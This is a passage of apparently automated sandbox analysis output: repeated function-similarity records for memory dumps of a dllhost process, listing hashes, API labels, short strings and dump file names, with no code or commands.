                                                                                                                                  • Opcode Fuzzy Hash: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction Fuzzy Hash: 9961CB3691DB88CAE760CB15E89832AB7A1F7C8B44F500916EACE47BA4DB7CC540CF54
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: da18fd4b9950f5b75121c5a33d21014a98e50bf918f97c8248def4d0c313f58f
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 1B51FB31B1A6088EEB14DF15D4CCB6C77A3FB84B98F148911DAC54B748D7B9D851C704
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: a0209e6c2917d6bf570bf68edfe56ae2d0afa2c3adfe8ea93ae7a185e232dad6
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: C751B13A204688CEEF748F1294CC35A77A2FB54B94F584A15DBD98BBD5EB34C9A0C701
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: 1bb2060d4907e0793818cbbf92b7d09f9137da87213f9fc12284f070d1fa48db
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: 7F619E32908BC889EB60CB15E4847DEB7A1FBC5B98F445A15EBD917B99DB7CC190CB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: f4bc01b7eb2ec319704e2879a499dc4cf4e87dd483b866ca5711639528f8f247
• Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
• Instruction Fuzzy Hash: 08518232A087888EEB748F11D5C839D77A2FBD4B94F186916DAD947BD5CB38C891CB01
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
• String ID: pid_
• API String ID: 4193868204-4147670505
• Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
• Instruction ID: e04fdfcdd1bee8a25ed55a54ec2859a73a57438903e16af4cceb35dc931996f0
• Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
• Instruction Fuzzy Hash: 8D118161B18B5995EB109B25E88835AB2B5FFC4780F800825EEC983A95EF78C959C300
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
• Instruction ID: a41519c935a66dc463951aabc709ac9defec7e57a128039227b0070d018143c5
• Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
• Instruction Fuzzy Hash: 52D1EF32B19A888DE710CFA9D5883EC3BB2FB54B98F444616DF9D97B99DA34C446C340
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
• Instruction ID: a694efbe066c2adc16dd5d05fb04f1b5244d19d79408820d313e7d6eef202d20
• Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
• Instruction Fuzzy Hash: E7014C72A15B94CAE705DF66E88824977B5FB89F80F094825DF8A53728DF38D491C740
APIs
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
• Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
• Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
• Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000290EDD1269F), ref: 00000290EDD127D2
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: ConsoleMode
• String ID:
• API String ID: 4145635619-0
• Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
• Instruction ID: 8e56a100005b7eda2bb6dd9dcaaf4a3bf166ac34099223d74f30425a52109219
• Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
• Instruction Fuzzy Hash: 0A911432F1A6588DFB54CF699ACA3AD3FA0FB54B88F444906DE8A53B95CB36C445C300
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
• Instruction ID: 5b6c518ce8db2df1cc01d770f9e3db7385e0eb61b5694929e17bfe84decb91fb
• Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
• Instruction Fuzzy Hash: 1D111226B55F098EFB00CF60E8993A833B4FB59758F441E25DEAD467A4DF78C1948340
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
• Instruction ID: a9927fb8daf362b972858d7acf84ec743ac6e554b9719d5fcc2d5ad8e7a05159
• Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
• Instruction Fuzzy Hash: 3A71E436A097898EE735DF2699C83EA7BA6FBC5784F840825DDC947B99DE34C601C700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
• Instruction ID: 86446507bfd2e62e954e9099b7f5f65a0b73635430e4073ae554b64bd5c455e4
• Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
• Instruction Fuzzy Hash: 0971F932A097895AE774DF2A9DCC3EA7B96FBC8794F400916DD8943B99DE34C605C700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
• Instruction ID: c4af10d05ca9d97ba8d3bc5267770c68993fd3a92605fbca60acb028580cf4b8
• Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
• Instruction Fuzzy Hash: CE51D23A311648CEEB54DB15E098B6E7393FB44B88F108924EA894F788FBB9D941C700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
• Instruction ID: 842348b470e78d3a06df6d2ae0b5046d4ad6df97fcb35b955ada422f71c5b44c
• Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
• Instruction Fuzzy Hash: 86619036504BC8C9EB709B15E48479FB7A1FB85B98F084615EBD90BB99EB7CC190CB00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: 6a29b570ffc8498ab72912983577f1bafd4bd9531f70f3b82db2ae966cc92201
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: A8412B73B2AA888AE720CF65E4897D9B7A5F798784F804421EECD87758DB3DC401C740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 625b55c7d289c3cb974f45602e3e52771a40f74f54af623f17ad6a6e766431fb
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: D7115E32619B4486EB608B25E444349BBE2FB88B94F584620EACD0B754DF7CC955C700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 1646373207-2227199552
                                                                                                                                  • Opcode ID: 5fdfdaf207782c2e4505a8b41fd18e1fc270cf37202bd35206560f60eda4ae09
                                                                                                                                  • Instruction ID: e194bf1a3fa1b3309944728d39276a51a9fcec6c1a6e98ab46ee00148a29e363
                                                                                                                                  • Opcode Fuzzy Hash: 5fdfdaf207782c2e4505a8b41fd18e1fc270cf37202bd35206560f60eda4ae09
                                                                                                                                  • Instruction Fuzzy Hash: 0DD0C9F8B1260292EF1AEB6378953E052529BADBC5F4940209F0647372EE38C0D48218
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: 4c167db9eddac8988c3ca807a26a23c6960b3d2c28b431bf5ddb36e092e5b419
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: 09118021E16B8485EB05CF66A88C35A77B1FBC9FD0F584528DE8E93765DF38D4828340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 5de5c3ea1fc49847edc6011cc50ab03f709a485906c2158c55116dc782ce3b3e
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: EFE03931A226048AE7058B62D84C34937E1EB89B05F448424898A07350DF7D84D98740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                  • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                  • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                  • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: ebe191a66650f6f1e162002ae2473e364b6af8b954f51eb87e8f25fc397a4c4d
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: F1E0E571A22A488AE70A9B62D84C35977B1FF89B15F888424C94A07320EE3C84D98A10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
